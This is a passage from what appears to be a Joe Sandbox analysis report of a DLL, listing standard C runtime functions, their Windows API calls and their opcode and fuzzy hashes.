                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction ID: b6e68c8e5646865891fe3c2e813574348240ee4b87e30bb570054094d9295719
                                                                                                • Opcode Fuzzy Hash: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction Fuzzy Hash: 433118B2C0121CAFDF02DFD9DD809DEBFB9BF18214F54412AE918B2291D7318A64DB65
                                                                                                Function 6F9591F8 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 436 6f9591f8-6f959222 437 6f959224-6f959226 436->437 438 6f959228-6f95922a 436->438 439 6f959279-6f95927c 437->439 440 6f959230-6f959237 call 6f95912d 438->440 441 6f95922c-6f95922e 438->441 443 6f95923c-6f959240 440->443 441->439 444 6f959242-6f959250 GetProcAddress 443->444 445 6f95925f-6f959276 443->445 444->445 447 6f959252-6f95925d call 6f955f50 444->447 446 6f959278 445->446 446->439 447->446
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction ID: 9242681f41b9aca7f2bc8fa335ca995abb737854bfc9102192db69dc204e1c84
                                                                                                • Opcode Fuzzy Hash: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction Fuzzy Hash: CA01BE77258611ABBF06CA6CDD40A563359EBD37707104115F614DB1CCDF31D4218B95

                                                                                                Non-executed Functions

                                                                                                Function 6F9525AB Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction ID: 23ecd557c1dc805c03c3c6812459aa0a4d63baa913363ccb1acc5b8aa5697faf
                                                                                                • Opcode Fuzzy Hash: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction Fuzzy Hash: 5E310775D053189BEB10DFA4C989BCCBBB8BF08304F1040AAE40DAB290EB719A94CF54
                                                                                                Function 6F954D54 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6F954E4C
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F954E56
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6F954E63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 918e2b18a93942d316af1ab1def3704264454066df4999102007c104a1f2de5b
                                                                                                • Instruction ID: 7fa29acf668cf4abfad764c02a533603007cb5661d3f1fe06b967b604baf4d54
                                                                                                • Opcode Fuzzy Hash: 918e2b18a93942d316af1ab1def3704264454066df4999102007c104a1f2de5b
                                                                                                • Instruction Fuzzy Hash: 7931D674901328ABDF61DF68D8887CDBBB8BF18350F5041DAE41CA7291EB709B958F45
                                                                                                Function 6F95EE25 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6F95EE20,?,?,00000008,?,?,6F95EA23,00000000), ref: 6F95F052
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 232531a205c420d68fd7a155f371e72de0c3c572bc6ee610a68a75802b8271d0
                                                                                                • Instruction ID: dc8ddc5da07c5314fc1acd9a9f3c6405da1e0febb92f932c8624729e42779fd5
                                                                                                • Opcode Fuzzy Hash: 232531a205c420d68fd7a155f371e72de0c3c572bc6ee610a68a75802b8271d0
                                                                                                • Instruction Fuzzy Hash: 2AB14A36210608DFD715CF28C586B947BE0FF45368F258699E8A9CF2E1C736E9A5CB40
                                                                                                Function 6F952778 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6F95278E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: 337a37a675ef7667079f3cc7710361596d4936e73f9fd28f8d3c879fd3c3b2e7
                                                                                                • Instruction ID: 9cf6447d822fc000bfa26f32c671eb46f3013d913d835b7fc15b5f9dfb85226f
                                                                                                • Opcode Fuzzy Hash: 337a37a675ef7667079f3cc7710361596d4936e73f9fd28f8d3c879fd3c3b2e7
                                                                                                • Instruction Fuzzy Hash: BF518071D196058BFB14CF94C9917A9BBF4FB49320F10886AD555EB380D774E920CFA1
                                                                                                Function 6F957B70 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8476b9d81b8ff57cc1bc19e81a17e9f6ff58743c0827da0bad890c741ab64ec
                                                                                                • Instruction ID: 0f6e94c60107f146015db91b3cd18800a44a46272d7e633e1100ea882ee7de2b
                                                                                                • Opcode Fuzzy Hash: e8476b9d81b8ff57cc1bc19e81a17e9f6ff58743c0827da0bad890c741ab64ec
                                                                                                • Instruction Fuzzy Hash: A641B1B580421DAEDB10DF69CC88AAABBBDEF55304F1082DDE41DD3281DB34DA948F20
                                                                                                Function 6F95955B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: a0a8fe147f57075af95db94413ee29a5b1a3f3236b89a6a56519139a5fb173c1
                                                                                                • Instruction ID: c019a0e94b5b9500e30749e995acaaf17ec3b5fbaa2ec6b1c645c951e5782fab
                                                                                                • Opcode Fuzzy Hash: a0a8fe147f57075af95db94413ee29a5b1a3f3236b89a6a56519139a5fb173c1
                                                                                                • Instruction Fuzzy Hash: 4CA012302095008B7B604E30430522C39995B035A0301401D9005C0010D6304120CA01
                                                                                                Function 6F957231 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 278COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                • Opcode ID: 0dece237a43e60d94882afae120587b9ab1020a26d53d64d09a6dd18dffa7308
                                                                                                • Instruction ID: bfd6ba309fbbdd3e50862742368b1701835e2fdd745e023c654a87069aadc7be
                                                                                                • Opcode Fuzzy Hash: 0dece237a43e60d94882afae120587b9ab1020a26d53d64d09a6dd18dffa7308
                                                                                                • Instruction Fuzzy Hash: 0D911A7190430A9EEF15CF64DC40BEE7BB9AF56328F10851AE850AA1C2E771D771CB62
                                                                                                Function 6F9540D9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                • Opcode ID: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction ID: d68dff75e1d19f502d277b8a782abd22065da85cd44a8ea43081635f370f0c4d
                                                                                                • Opcode Fuzzy Hash: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction Fuzzy Hash: 11B17A71C00209DFCF58CFA8D9A099EB7B9BF55318F10416AE8106B296D731EA72CF91
                                                                                                Function 6F95CD11 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,6F95CFE1,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 6F95CDB7
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95CE72
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95CF01
                                                                                                • __freea.LIBCMT ref: 6F95CF4C
                                                                                                • __freea.LIBCMT ref: 6F95CF52
                                                                                                • __freea.LIBCMT ref: 6F95CF88
                                                                                                • __freea.LIBCMT ref: 6F95CF8E
                                                                                                • __freea.LIBCMT ref: 6F95CF9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                • Opcode ID: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction ID: 6427da8743cc68f813d9277217a5a15751a5b07a0a771e4bbca6e80389495599
                                                                                                • Opcode Fuzzy Hash: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction Fuzzy Hash: D771E272A04305ABEF11CEB58C40BEF7BBA9F4A314F14015AED14BB2C1E735E92587A1
                                                                                                Function 6F953010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction ID: ead23f0e58b78240c10f663c830149cce8d8a4e8ea26d57c37804581b3eba9f6
                                                                                                • Opcode Fuzzy Hash: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction Fuzzy Hash: C7417234A00319ABDF10CF79C885E9EBBB6AF45368F108159E9149B3D2D732E925CF91
                                                                                                Function 6F953727 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction ID: 55fdda806f67d341de7e6315f8943b37e07243cf9b6803278666ec7b786dd641
                                                                                                • Opcode Fuzzy Hash: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction Fuzzy Hash: 4F01F773A2CB115EBB1095B8ACD7E6A276ADB07779720032EE130D50E1EF51D835AA90
                                                                                                Function 6F957FBD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • C:\Windows\system32\loaddll32.exe, xrefs: 6F957FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\system32\loaddll32.exe
                                                                                                • API String ID: 0-1062229814
                                                                                                • Opcode ID: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction ID: 1597c5ab29c6056f2b844a429e15773aa7f25723b31fc11314ad33efb6e76bb7
                                                                                                • Opcode Fuzzy Hash: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction Fuzzy Hash: 9D219D71218606AFEB24DFB5888099B77ADEF113687008918E919DB1D1EB30EC258BA0
                                                                                                Function 6F953C69 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                • Opcode ID: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction ID: bf6d080421070cce3ce2d0b880099514b46054195cae0c3e3f03cb59de10071a
                                                                                                • Opcode Fuzzy Hash: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction Fuzzy Hash: 2511A771A44621ABFF22CB78C942F5937A9AF02770F100215ED11AB1C0D770F920C6D5
                                                                                                Function 6F9552BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6417AA48,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction ID: a2a5d3eee320de7d7d6efa6493a3a3008c493e11d049b6108d2eb59632f2bbfb
                                                                                                • Opcode Fuzzy Hash: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction Fuzzy Hash: 23014471918919EBEF028B54CC44BBE7BB9FB45724F00062AF921E22D4DB75D910CA50
                                                                                                Function 6F95B654 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
